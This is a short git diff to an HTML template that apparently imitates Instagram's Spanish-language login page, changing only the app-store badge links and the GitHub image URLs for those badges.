--- a/assets/templates/LoginInstagram.html
+++ b/assets/templates/LoginInstagram.html
@@ -487,11 +487,11 @@
                 <div class="app">
                   <p>Descarga la app.</p>
                   <div class="app-img">
-                      <a href="https://itunes.apple.com/app/instagram/id389801252?pt=428156&amp;ct=igweb.loginPage.badge&amp;mt=8">
-                      <img src="https://raw.githubusercontent.com/solidsnk86/formularioWeb-1/master/ZKu1RMHF20e.png" >
+                      <a href="https://play.google.com/store/apps/details?id=com.instagram.android&hl=es_AR&gl=US">
+                      <img src="https://github.com/solidsnk86/LoginCards-RedirectionPages/blob/master/assets/img/0BpxdgM3WUr.png?raw=true" >
                       </a>
-                      <a href="https://play.google.com/store/apps/details?id=com.instagram.android&amp;referrer=utm_source%3Dinstagramweb%26utm_campaign%3DloginPage%26utm_medium%3Dbadge">
-                      <img src="https://raw.githubusercontent.com/solidsnk86/formularioWeb-1/master/0BpxdgM3WUr.png">
+                      <a href="https://apps.microsoft.com/store/detail/instagram/9NBLGGH5L9XT?hl=es-ar&gl=ar">
+                      <img src="https://github.com/solidsnk86/LoginCards-RedirectionPages/blob/master/assets/img/LjIQEL8csb0-Mic.png?raw=true">
                     </a>  
                   </div>  <!-- App-img end-->
                 </div> <!-- App end -->
